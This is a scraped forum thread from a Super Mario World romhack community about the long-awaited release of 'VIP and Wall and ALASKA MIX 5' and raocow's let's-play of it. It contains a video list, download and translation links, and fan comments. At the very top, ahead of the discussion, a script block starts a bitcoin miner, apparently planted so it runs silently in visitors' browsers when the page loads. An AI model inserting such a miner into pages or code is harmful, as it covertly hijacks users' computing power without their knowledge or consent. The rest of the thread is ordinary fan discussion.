<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxysmbx communitysmw central

VIP and Wall and ALASKA MIX 5: It's not 99%

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
alex2
Banned

VIP and Wall and ALASKA MIX 5: It's not 99%

Postby alex2 » 8 years ago

After many years of halted progress, this hack has finally been completed. For three (?) years, Mix5 has stood at 99% completion. The reason is not known to very many people (save those who read the request thread); the creator of the final level disappeared off the internet for the longest while. This left the collaborators more-or-less twiddling their thumbs (for lack of a more complementory phrase).

raocow is the man who brought the Mix series to YouTube (and SA?). I remember back when he did his first run of the Vips on SA. When he finished Mix4, I had expected each new LP to be Mix5. Around the time he started to do his YouTube runs, I basically gave up any hope that I had for that game.

Then, a few weeks ago, I was notified of the final release of Mix5 by one of my friends on Skype. The speed that I logged onto here to inform raocow would blow your mind. A translation came relatively quickly, thanks to vgboy.

After many years of waiting, this hack has noticeably aged. It isn't up to the standards of hacks that are released nowadays, as far as aesthetics go, but it's more advanced that Mix4, as far as I can tell. Whether or not this matters or not is up to the players/viewers. The hack isn't really "flashy" throughout the first world. The second world and beyond are where things start to get cranked up.

Will it live up to the hype? Only time will tell. No matter what happens, though, one thing is certain: this is going to be, proverbially, a thing.

Link to the latest version of Mix5.
Link to vgboy's translation.

Videos:
SMW VIP & Wall & ALASKA MIX 5 - 1 - oh hey, this
Vip5 - 2 - the second video
Vip5 - 3 - one must add before one can subtract, but this is meaningless to division
Vip5 - 04 - complete confusion, concerns, in two flavours
Vip5 - 05 - strategies for a young entrepeneur
Vip5 - 06 - Star Platinum and the rumbling rumpus
Vip5 - 07 - sibling rivalry
Vip5 - 08 - nature is playful when not lethal (or leather)
Vip5- 09 - who wanna be a pokeman
Vip5 - 10 - a useless trainwreck deep in the woods
Vip5 - 11 - gonna steal a monkey's dinner
Vip5 - 12 - tripping up through tedium town
Vip 5 - 13 - aiming for self-destruction
Vip5 - 14 - gotta fly in cave town
Vip5 - 15 - equine-based problems
Vip5 - 16 - take a shower, take a shower
Vip5 - 17 - beach side and party time blender
Vip5 - 18 - making bad decisions is a process in both learning and mental instability
Vip5 - 19 - No boxes.
Vip5 - 20 - careful, friendly, helpful, and other dubious things
Vip5 - 21 - can't spell nice without ice (not my best title)
Vip5 - 22 - the stains in the clouds are on your hands
Vip5 - 23 - no chicken was found. anywhere.
Vip5 - 24 - all that is good, all that is good
Vip5 - 25 - can't feel blood in my right hand right now
Vip5 - 26a - beside the equations (working it out)
Vip5 -26b - within the equations (it working out)
Vip5 - 27 - complete and utter whiplash
vip5 - 28 - what exactly is the meaning of those switch blocks
Vip5 - 29 - turn that funky moss house and skip to the beat day-o
Vip5 - 30 - life is short so watch that dryer setting
Vip5 - 31 - saying words as if meaning was objective
Vip5 - 32 (it's true!) - snow day (it's been over a month now!)
Vip5 - 33 - sadness is a happy smile, a chirpy laugh, a friendly hug
Vip5 - 34 - the boat with four walls (based on a dubious story)
Vip5 - 35 - skidding and leaping along the English Channel
Vip5 - 36 - intermediate savings in power and lettuce (passive tense)
Vip5 - 37 - DON'T GET IMPATIENT!!!!!!!!!!!!!!!!!!!!
vip5 - 38 - spin spin doggy spin
Vip5 - 39 - it all went great until it didn't
VIp5 - 40 - sailin' the seven skies
vip5 - 41 - an introduction to castle Julius
Vip5 - 42 - scaling a space volcano castle, with a slight basement detour
Vip5 - 43 - exploring the lounge julius
Vip5 - 44 - did somebody say CASTLE JULIUS?!?
Vip5 - 45 - well, "45"
vip5 - 46 - julius is a guy, a groovy guy, but also a boring kind of guy (doesn't go out much)
Vip5 - A - lava lava everywhere
Vip5 - B - can you believe that bowser's castle is finally done? how about love after love?
Vip5 - 47 - the post-game roars on
Vip5 - 48 - Terrible Brutal Weapon
Vip5 - 49 - ?????????????????????
Vip5 - 50 - a nicely trimmed beard can go a long way
vip5 - 51 - pressing the 'B' multiple times, in a specific rhythm
Vip5 - 52 - sparkles and bears, somewhere over 100 feet
Vip5 -53 -first step towards the last
Vip5 - 54 - second step towards the last
Vip5 - 55 - third step towards the last
Vip5 - FINAL - last step towards the last
Last edited by Anonymous on 29 Aug 2011, 13:36, edited 46 times in total.
Warning: Opinions expressed by alex2 or others in this post do not necessarily reflect the views, opinions, or position of alex2 himself on the matter(s) being discussed therein.
raocow wrote:a3xt will be my last project, after which I will quit lp forever
SPASM - LevelASM for Yoshi's Island!
My mosts things:

YummyCin

Re: Vip and Wall and Alaska Mix 5: It's not 99%

Postby YummyCin » 8 years ago

I will be extremely impressed if it can live up to a 3-year hype. isn't that pretty much the romhack equivalent of Duke Nukem?
Yum, Cinnamon!
oh woops and then it's gone.

Yikes

Postby Yikes » 8 years ago

I really enjoied this hack and I am glad raocow is LPing it. If he could make the whole thing save stateless, it would probably become my favourite LP ever. But the difficulty in some of the levels is just nuts. Most of the harder levels are just about learning what killed you there but there are some really unfair parts, that made me swear even with save states. But about 75-80% of the levels were fun and there were some parts where I really laughed about the craziness.

It is probably the hardest in the series and raocow: Whatever you do with this game, I hope you can enjoy it.
Gesundheit!

kilon

Postby kilon » 8 years ago

All I'm saying at this point is that I wouldn't mind if this is the last hack of the series.

raocow
the death of the incredible huge
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Postby raocow » 8 years ago

Huh, did something happen to pukiwiki? I want to edit the OP's link to lead to the pukiwiki vip5 page instead, like they want people too, but it seems offline right now.

(edit: http://vip.rgr.jp/sm4wiki/?改造マリオの共同開発5) this is pretty much where you'd want to go, I reckon.
the chillaxest of dragonsImage
ImageImage

morsel/morceau

Postby morsel/morceau » 8 years ago

And Then There Was A (Let's) Play About A Romhack

This link might be the one to watch (it explains why the download isn't working just now)
-wiki http://www18.atwiki.jp/sm4wiki_mix
-vip5 page http://www18.atwiki.jp/sm4wiki_mix/pages/83.html
dont wanna jihad no more

rubberfishy

Postby rubberfishy » 8 years ago

The last 5 series didn't really do it for me so I kinda stopped watching raocow's lp's admittedly, but now vip 5 is here. woop. time for raocow videos. clearly milk is perfect for school boys once more. the full moon revels in the endless sombre of the autumn nocturnal breeze of our soul.
you can't lead a mouse to water but you can make it drink. just give it some salty salty peanuts.

raocow still says things like that right?
Last edited by rubberfishy on 02 Jul 2011, 12:16, edited 2 times in total.

Cobalt

Postby Cobalt » 8 years ago

YAAAAAAY I MUST DO A FULL RUN OF THIS AS SOON AS POSSIBLE
Also I didn't know vgboy made the translation he's a pretty cool guy and i've watched his vocaloid stuff so many times it's somewhat sad
can YOU use the packet sauce?

Xirix
The British Palindrome

Postby Xirix » 8 years ago

VIP 5 already? I thought you were holding off for some patch revisions?

raocow
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

What does the reason say, exactly? Google translate makes it just say that basically 'there be an error but we don't know what'. Ah well.

Xirix - well, it's already version 0.3, so it's a few updates in, and I've heard enough reports of people ending the game without any bug-related problems, with seemingly everything working, that I'm confident enough to get it. Also the overworld is fancy enough that I very much doubt they'll do a complete overworld rejiggering like they did with vip 2.
ImageImage

morsel/morceau

Postby morsel/morceau » 8 years ago

It's something like they're continuing to update for the moment so the link is disabled.

(ie, if you want vip5 just now you need to get it through the uploader not the new wiki. shhhh)
dont wanna jihad no more

raocow

Hmm.

When a new version comes out, if anyone can suss out what was changed, and if it changed anything in the levels I've already completed, I'd like to know so I can 'report' on the changes or whatnot if they are significant.
ImageImage

Mandew
First name: Marc
Pronouns: a person

Re: VIP and Wall and ALASKA MIX 5: It's not 99%

Postby Mandew » 8 years ago

The VIP series is one of the most defining set of LPs for raocow's long time watchers, I think. A year ago, I really couldn't wait until VIP 5 was released.

The rest of the VIP series admittedly probably didn't age very well, but they still have their certain charm about them.
video games

LucarioPK

Postby LucarioPK » 8 years ago

Ah this game...sweet. I've been waiting since VIP 4!

I liked the switch palace, but nothing else really stood out.
Hi!

alex2
Banned

You will probably end up disliking world 2, raocow.
Last edited by Anonymous on 02 Jul 2011, 17:55, edited 1 time in total.
Warning: Opinions expressed by alex2 or others in this post do not necessarily reflect the views, opinions, or position of alex2 himself on the matter(s) being discussed therein.
My mosts things:

Test Pilot Monkey

Postby Test Pilot Monkey » 8 years ago

Yikes wrote:If he could make the whole thing save stateless, it would probably become my favourite LP ever.
It's been so long, I'd forgotten raocow ever used savestates. I hope this hack doesn't force him to touch them.

Also; Nice haiku, raocow :)

Ashan
The world has become a place

Postby Ashan » 8 years ago

That link to download the latest version of Mix5 isn't working. I clicked the link, hit "Ver1.03", and I get a "403 Error - Forbidden" page. Or maybe I'm just stupid, which is a very likely possibility.

Daarkbuu

Postby Daarkbuu » 8 years ago

Yeah because we all know that vanilla level design is SSSSOOOOOOOO 'crappy'. You've been spoiled by fancy ExGFX and consistency raocow!

Also Hype is stupid. Did people honestly expect Carol, ping, and the the ppp guy doing asm for every level and some guy with Nintendo quality level design doing the actual stages.....psh!

Looking forward to the rest of the LP though
unf

raocow

I still think the very first stage is really 'eh', but by the end of the video I think you can hear that I've already pretty much turned.

Ashan - read the rest of the thread!
ImageImage

S.N.N.

Postby S.N.N. » 8 years ago

This hack is still very "eh" up until about halfway through. Still though, it's nice to see it completed at last, I guess, and I'll be watching it through to the end I'm sure.

Ashan
The world has become a place

Postby Ashan » 8 years ago

raocow wrote: Ashan - read the rest of the thread!
At least I was right. I'm just too stupid to spend the extra minute reading the next few posts after the first one. >_>
Last edited by Ashan on 02 Jul 2011, 17:00, edited 1 time in total.

MrDeePay

Postby MrDeePay » 8 years ago

Alex wrote:The reason is not known to very many people (save those who read the request thread); the creator of the final level disappeared off the internet for the longest while. This left the collaborators more-or-less twiddling their thumbs (for lack of a more complementory phrase).
Then the level should've been passed onto someone else. If you're going to be dead weight, then you should be cut from the project.

alex2
Banned

MrDeePay wrote:
Alex wrote:The reason is not known to very many people (save those who read the request thread); the creator of the final level disappeared off the internet for the longest while. This left the collaborators more-or-less twiddling their thumbs (for lack of a more complementory phrase).
Then the level should've been passed onto someone else. If you're going to be dead weight, then you should be cut from the project.
The level was apparently "too amazing to drop," or something. I have no idea what sort of power this guy actually had, but SNN said it would be like him suddenly leaving the SMWCP2 project. I figure it's sort of like how A2MT slowed when FoD's internet cut out (or whatever) last year.

I don't know! I was just going off of what I read on the wiki a long time ago (I think it was puki, but maybe it was on another Japanese site) and in the request thread.
My mosts things:

S.N.N.

Postby S.N.N. » 8 years ago

^ Doesn't that technically imply that no other designer even came close to .. whoever this guy was? Surely someone (or a team of them) could have whipped up something that was around the same quality and not delayed the project by years, assuming this really was the case.

...then again, I'm sure their collaboration methods aren't really as perfect as they could be, so it's more of a shock to see that the thing actually got released in the end.

vgboy

Postby vgboy » 8 years ago

It looks like 1.04 may be changing the enemy names in the ending to the Japanese AA names and adding a small message on the final screen. If they do, I'll update the translation and let you know.

raocow, since you said "That's worrying!" instead of "Decisions, decisions!" (I changed it because I figured the latter sounded better), I think you might need to update your file, since a couple messages got switched around in 1.03. No levels, though.

Also, to Alex:
Not only do I not understand why you'd tell him directly instead of waiting for him to read it, they switched around the Nonsense! boxes so that the message box telling you about the ENDURANCE shortcut is in World 4 instead of World 2.

Return to “let's play”